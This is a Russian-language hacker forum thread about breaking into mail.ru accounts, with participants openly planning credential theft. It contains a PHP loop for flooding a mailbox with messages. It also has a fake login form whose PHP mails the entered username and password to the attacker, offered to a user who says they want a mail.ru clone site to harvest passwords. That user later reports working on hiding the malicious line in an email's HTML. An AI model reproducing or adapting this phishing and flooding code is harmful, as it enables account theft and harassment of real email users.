![]() |
Php скриптом
Вот я нарыл php скрипт ломает mail.ru :)
Вот я выложил на сайт се но хост PHP не очень любит :) Кто нибудь проверти что там в скрипте :) Качаем : тут :p |
Так ты толком не знаешь что это за скрипт?
+ Он сам взломает мэйл.ру ? =)) |
Помоему эти скрипты способны токо куки вытаскивать......
|
Там 2 скрипта. Второй из них посылает java скрипт в теле письма, подробнее о таком способе читайте в статье взлом mail.ru на АНТИЧАТЕ
Вроде еще и видио было... Хотя не уверен... |
А его кто нибуть выкладывал если да то дайте ссылку !?
|
ну, скрипты эти максимум только принимают куки и реффереры
|
В каком месте ты там это нашел? Они ни чего не принимают, они только посылают мыло с html'ным телом.
|
я туда даже не заглянул, я просто знаю, для чего обычно нужны подобные скрипты...
|
Plzz посоветуйте скрипт для отправки мыла............
|
mail('кому отправить надо','Имя сообщения','Сообщение', "Content-type: text/html\r\nFrom: ameli@yahoo.com(отправляеый ящик)\r\n")
|
Если надо флудер то так
?> $lol="admin@mail.ru"; //кому $tema="fuck off"; // тема письма $f="fuck"; // Само письмо $kolvo="10"; // сколько писем отправить for($i=1; $i<=$kolvo; $i++) { mail("$lol", "$tema", "$f"); } ?> |
А можно более подробно........ просто я собираюсь создать сайт копию mail.ru и чтоб когда юзер введет пороль содержимое формы ушло мне на мыло. А зачем ameli@yahoo.com???
|
зделай форуму в ней переменную и успловие и через mail(отправляй)
|
а вообше мне кажеться надо чтобы писалось в файл так будет легче...-)
|
<html>
<form action="" method="post"> <input name="login"> <input name="pass"> <input type="submit""> </form> <?php $mail="фывфыв"; //твоё мыло $kk="lol"; mail("$mail","$kk","$login$pass"); ?> |
2em00s7 трудно всё в один пост написать?
|
Zinger нет -))) только щас я посчитал нужным написать в 3 сообщения...-))
|
хз как майл.ру МДААААААА. долго смеялся, кстати смех продлевает жизнь, учитывая твои знания, тебе лучще кого-нить нанять. советую =)
|
Sn@k3 да ладно тебе видеш человек хочет заниматься Си и воровать мыла))))
|
Цитата:
|
Цитата:
Что косается создать сайт ловушку то это вполне реально......... Может тебе слобо |
Stoker замени форму на мою и всё гатова ))) только тебе нужен хост с поддершкой php и включённая функция mail()
|
Thanks... хостинг нашел... скрипт рулит.. Осталось дело за малым замаскировать нехорошую строку в HTML коде письма над чем сейчас и работаю. Буду блогодарен за содействие.
|
| Время: 14:47 |